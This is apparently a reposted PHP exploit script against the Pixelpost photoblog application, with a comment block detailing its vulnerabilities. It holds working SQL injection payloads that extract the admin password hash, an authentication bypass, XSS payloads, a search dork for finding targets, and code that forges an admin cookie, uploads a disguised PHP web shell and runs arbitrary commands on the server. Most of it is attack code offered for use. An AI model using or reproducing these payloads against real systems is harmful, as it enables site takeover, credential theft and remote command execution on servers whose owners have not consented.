#!/usr/bin/php -q -d short_open_tag=on

<?

echo "Pixelpost <= 1-5rc1-2 privilege escalation exploit\r\n";

echo "by rgod [EMAIL PROTECTED]";

echo "site: http://retrogod.altervista.org\r\n";;

echo "dork: pixelpost \"RSS 2.0\" \"ATOM feed\" \"Valid xHTML / Valid 
CSS\"\r\n\r\n";


/*

works with:

magic_quotes_gpc=Off

*/


if ($argc<5) {

echo "Usage: php ".$argv[0]." host path your_ip cmd OPTIONS\r\n";

echo "host:      target server (ip/hostname)\r\n";

echo "path:      path to pixelpost\r\n";

echo "your ip:   your actual ip adress, we need it to build an admin 
cookie\r\n";

echo "           this is automatically set to your proxy ip if you use one\r\n";

echo "cmd:       a shell command\r\n";

echo "Options:\r\n";

echo "   -T[prefix]   specify a table prefix different from \"pixelpost_\"\r\n";

echo "   -p[port]:    specify a port other than 80\r\n";

echo "   -P[ip:port]: specify a proxy\r\n";

echo "Examples:\r\n";

echo "php ".$argv[0]." a.b.c.d /pixelpost/ w.x.y.z cat 
./../includes/pixelpost.php\r\n";

echo "php ".$argv[0]." a.b.c.d / w.x.y.z  ls -la -p81\r\n";

echo "php ".$argv[0]." a.b.c.d / none ls -la -P1.1.1.1:80\r\n";

die;

}

/* software site: http://www.pixelpost.org/


   description: "A small photoblog application that's a no-brainer to set up and

   use - this is truly for anyone wishing regularly to post their photos on  the

   web like a blog."


   -----


   i) sql injection in index.php near lines 670-680:


   ...

   if($_GET['category'] != "")

        {

                // Modified from Mark Lewin's hack for multiple categories

                $query = mysql_query("SELECT 1,t2.id,headline,image,datetime

                                      FROM  {$pixelpost_db_prefix}catassoc as t1

                                      INNER JOIN 
{$pixelpost_db_prefix}pixelpost t2 on t2.id = t1.image_id

                                      WHERE t1.cat_id = '".$_GET['category']."'

                                      AND (datetime<='$cdate')

                                      ORDER BY datetime DESC");

                $lookingfor = 1;

        }

   ...


   nice code, isn't it?


   with magic_quotes_gpc = Off:

   http://[target]/[path]/index.php?x=browse&category='UNION SELECT 
'1','2',admin,'4','5' FROM pixelpost_config WHERE id=1/*

   http://[target]/[path]/index.php?x=browse&category='UNION SELECT 
'1','2',password,'4','5' FROM pixelpost_config WHERE id=1/*


   now, at screen, you have admin username & MD5 password hash and you can build

   an admin cookie:


   Cookie: pp_user=[username]; pp_password=[sha1([md5hash].[your_ip_address])];


   Admin can upload .php files in images/ folder, files are renamed but you can

   see new filename in main index page, so... you launch commands:


   
http://[target]/[path]/images/20060603005716_suntzu.php?cmd=cat%20./../includes/pixelpost.php


   ii) same kind of sql injection in 'archivedate' argument at lines 681-687:

   ...

   ELSE IF ($_GET['archivedate'] != "")

        {


                $where = "AND (DATE_FORMAT(datetime, 
'%Y-%m')='".$_GET['archivedate']."')"; //DATE_FORMAT(foo, '%Y-%m-%d')

                $query = mysql_query("SELECT 1,id,headline,image, datetime FROM 
".$pixelpost_db_prefix."pixelpost WHERE (datetime<='$cdate') $where ORDER BY 
datetime desc");

                $lookingfor = 1;

        }

   ...

   poc:


   
http://[target]/[path]/index.php?x=browse&archivedate=')%20UNION%20SELECT%20'1','2',password,'4','5'%20FROM%20pixelpost_config/*


   iii)

   in admin/ folder at the begin of every script, except for index.php, we have:


   <?php

   if(!isset($_SESSION["pixelpost_admin"]) || $cfgrow['password'] != 
$_SESSION["pixelpost_admin"]) {

        die ("Try another day!!");

   }

   ...


   if register_globals= On, you can easily bybass this protection, poc:


   
http://[target]/]path]/admin/view_info.php?_SESSION[pixelpost_admin]=1&cfgrow[password]=1


   this can be used to see some interesting configuration info about target 
server:


   
http://[target]/[path]/admin/view_info.php?_SESSION[pixelpost_admin]=1&cfgrow[password]=1&view=info


   or to launch XSS attacks:


   
http://[target]/[path]/admin/view_info.php?_SESSION[pixelpost_admin]=1&cfgrow[password]=1&view=info&admin_lang_pp_exif1=<script>alert(document.cookie)</script>

   
http://[target]/[path]/admin/view_info.php?_SESSION[pixelpost_admin]=1&cfgrow[password]=1&view=info&admin_lang_pp_exif2=<script>alert(document.cookie)</script>

   
http://[target]/[path]/admin/view_info.php?_SESSION[pixelpost_admin]=1&cfgrow[password]=1&view=info&admin_lang_pp_path=<script>alert(document.cookie)</script>


   iv) another xss, without to be logged in:

   
http://[target]/[path]/admin/index.php?loginmessage=";><script>window.open("http://retrogod.altervista.org";)</script>


                                                                              */

error_reporting(0);

ini_set("max_execution_time",0);

ini_set("default_socket_timeout",5);


function quick_dump($string)

{

  $result='';$exa='';$cont=0;

  for ($i=0; $i<=strlen($string)-1; $i++)

  {

   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))

   {$result.="  .";}

   else

   {$result.="  ".$string[$i];}

   if (strlen(dechex(ord($string[$i])))==2)

   {$exa.=" ".dechex(ord($string[$i]));}

   else

   {$exa.=" 0".dechex(ord($string[$i]));}

   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}

  }

 return $exa."\r\n".$result;

}

$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';

function sendpacketii($packet)

{

  global $proxy, $host, $port, $html, $proxy_regex;

  if ($proxy=='') {

    $ock=fsockopen(gethostbyname($host),$port);

    if (!$ock) {

      echo 'No response from '.$host.':'.$port; die;

    }

  }

  else {

        $c = preg_match($proxy_regex,$proxy);

    if (!$c) {

      echo 'Not a valid proxy...';die;

    }

    $parts=explode(':',$proxy);

    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";

    $ock=fsockopen($parts[0],$parts[1]);

    if (!$ock) {

      echo 'No response from proxy...';die;

        }

  }

  fputs($ock,$packet);

  if ($proxy=='') {

    $html='';

    while (!feof($ock)) {

      $html.=fgets($ock);

    }

  }

  else {

    $html='';

    while ((!feof($ock)) or 
(!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {

      $html.=fread($ock,1);

    }

  }

  fclose($ock);

  #debug

  #echo "\r\n".$html;


}


function is_hash($hash)

{

 if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}

 else {return false;}

}


function make_seed()

{

   list($usec, $sec) = explode(' ', microtime());

   return (float) $sec + ((float) $usec * 100000);

}


$host=$argv[1];

$path=$argv[2];

$your_ip=$argv[3];

$cmd="";$port=80;$proxy="";$table_prefix="pixelpost_";


for ($i=4; $i<=$argc-1; $i++){

$temp=$argv[$i][0].$argv[$i][1];

if (($temp<>"-p") and ($temp<>"-P") and ($temp<>"-T"))

{$cmd.=" ".$argv[$i];}

if ($temp=="-p")

{

  $port=str_replace("-p","",$argv[$i]);

}

if ($temp=="-P")

{

  $proxy=str_replace("-P","",$argv[$i]);

}

if ($temp=="-T")

{

  $table_prefix=str_replace("-T","",$argv[$i]);

}

}

$cmd=urlencode($cmd);

if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the 
path!'; die;}

if ($proxy=='') {$p=$path;} else

{

$p='http://'.$host.':'.$port.$path;

$temp=explode(":",$proxy);

$your_ip=$temp[0];

}


echo "Trying sql injection in 'category' argument...\r\n";

$sql="'/**/UNION 
SELECT/**/'1','2',password,'4','5'/**/FROM/**/".$table_prefix."config/**/WHERE/**/id=1/*";

$sql=urlencode($sql);

$packet="GET ".$p."?x=browse&category=".$sql." HTTP/1.0\r\n";

$packet.="Host: ".$host."\r\n";

$packet.="Connection: Close\r\n\r\n";

sendpacketii($packet);

$temp=explode("alt=\"",$html);

$temp2=explode("\"",$temp[1]);

$hash=trim($temp2[0]);

if (is_hash($hash)){

echo "admin md5 password hash -> ".$hash."\r\n";

$sql="'/**/UNION/**/SELECT/**/'1','2',admin,'4','5'/**/FROM/**/".$table_prefix."config/**/WHERE/**/id=1/*";

$sql=urlencode($sql);

$packet="GET ".$p."?x=browse&category=".$sql." HTTP/1.0\r\n";

$packet.="Host: ".$host."\r\n";

$packet.="Connection: Close\r\n\r\n";

sendpacketii($packet);

$temp=explode("alt=\"",$html);

$temp2=explode("\"",$temp[1]);

$admin=trim($temp2[0]);

echo "  \"   username          -> ".$admin."\r\n";

}

else { echo "Trying with 'archivedate' argument...\r\n";

$sql="')/**/UNION 
SELECT/**/'1','2',password,'4','5'/**/FROM/**/".$table_prefix."config/**/WHERE/**/id=1/*";

$sql=urlencode($sql);

$packet="GET ".$p."?x=browse&archivedate=".$sql." HTTP/1.0\r\n";

$packet.="Host: ".$host."\r\n";

$packet.="Connection: Close\r\n\r\n";

sendpacketii($packet);

$temp=explode("alt=\"",$html);

$temp2=explode("\"",$temp[1]);

$hash=trim($temp2[0]);

if (is_hash($hash)){

         echo "admin md5 password hash -> ".$hash."\r\n";

         }

else {die ("Exploit failed...magic_quotes_gpc on here or code patched");}


$sql="')/**/UNION/**/SELECT/**/'1','2',admin,'4','5'/**/FROM/**/".$table_prefix."config/**/WHERE/**/id=1/*";

$sql=urlencode($sql);

$packet="GET ".$p."?x=browse&archivedate=".$sql." HTTP/1.0\r\n";

$packet.="Host: ".$host."\r\n";

$packet.="Connection: Close\r\n\r\n";

sendpacketii($packet);

$temp=explode("alt=\"",$html);

$temp2=explode("\"",$temp[1]);

$admin=trim($temp2[0]);

echo "  \"   username          -> ".$admin."\r\n";

}


$cookie="pp_user=".$admin."; pp_password=".sha1($hash.$your_ip).";";

$packet="GET ".$p."admin/index.php HTTP/1.0\r\n";

$packet.="Host: ".$host."\r\n";

$packet.="Cookie: ".$cookie."\r\n";

$packet.="Connection: Close\r\n\r\n";

sendpacketii($packet);

$temp=explode("Set-Cookie: ",$html);

$cookie="";

for ($i=1; $i<=count($temp); $i++)

{

$temp2=explode(" ",$temp[$i]);

$cookie.=" ".$temp2[0];

}

echo "admin cookie            ->".$cookie."\r\n";


$shell=

'<?php

if (get_magic_quotes_gpc()){$_REQUEST["cmd"]=stripslashes($_REQUEST["cmd"]);}

ini_set("max_execution_time",0);

error_reporting(0);

echo chr(0x2A).chr(0x64).chr(0x65).chr(0x6C).chr(0x69).chr(0x2A);

passthru($_REQUEST["cmd"]);

echo chr(0x2A).chr(0x64).chr(0x65).chr(0x6C).chr(0x69).chr(0x2A);

?>';

srand(make_seed());

$anumber = rand(1,99999);

$my_file="suntzu".$anumber.".php";

$data='

-----------------------------7d6318101b00a2

Content-Disposition: form-data; name="headline"


Under Costruction... - Admin.

-----------------------------7d6318101b00a2

Content-Disposition: form-data; name="category[]"


1

-----------------------------7d6318101b00a2

Content-Disposition: form-data; name="body"



-----------------------------7d6318101b00a2

Content-Disposition: form-data; name="autodate"


3

-----------------------------7d6318101b00a2

Content-Disposition: form-data; name="post_year"



-----------------------------7d6318101b00a2

Content-Disposition: form-data; name="post_month"



-----------------------------7d6318101b00a2

Content-Disposition: form-data; name="post_day"



-----------------------------7d6318101b00a2

Content-Disposition: form-data; name="post_hour"



-----------------------------7d6318101b00a2

Content-Disposition: form-data; name="post_minute"



-----------------------------7d6318101b00a2

Content-Disposition: form-data; name="userfile"; filename="'.$my_file.'"

Content-Type: image/jpeg


'.$shell.'

-----------------------------7d6318101b00a2

Content-Disposition: form-data; name="submit"


Upload

-----------------------------7d6318101b00a2--

';


$packet="POST ".$p."admin/index.php?x=save HTTP/1.0\r\n";

$packet.="Content-Type: multipart/form-data; 
boundary=---------------------------7d6318101b00a2\r\n";

$packet.="Host: ".$host."\r\n";

$packet.="Content-Length: ".strlen($data)."\r\n";

$packet.="Cookie: ".$cookie."\r\n";

$packet.="Connection: Close\r\n\r\n";

$packet.=$data;

sendpacketii($packet);


$packet="GET ".$p."index.php HTTP/1.0\r\n";

$packet.="Host: ".$host."\r\n";

$packet.="Connection: Close\r\n\r\n";

sendpacketii($packet);

$temp=explode("img src=\"",$html);

$temp2=explode(" ",$temp[1]);

for ($i=1; $i<=count($temp); $i++)

{

$temp2=explode("\"",$temp[$i]);

if (eregi($my_file,$temp2[0]))

 {

  $my_path=$temp2[0];

  echo "shell -> ".$my_path."\r\n";

  break;

 }

}


$packet="GET ".$p.$my_path." HTTP/1.0\r\n";

$packet.="Host: ".$host."\r\n";

$packet.="Cookie: cmd=".$cmd.";\r\n";

$packet.="Connection: Close\r\n\r\n";

sendpacketii($packet);

if (strstr($html,"*deli*"))

{

 $temp=explode("*deli*",$html);

 die("Exploit succeeded...\r\n".$temp[1]);

}

else

{

 echo "Failed to launch commands...";

}

?>


original url: http://retrogod.altervista.org/pixelpost_15rc12_xpl.html

Reply via email to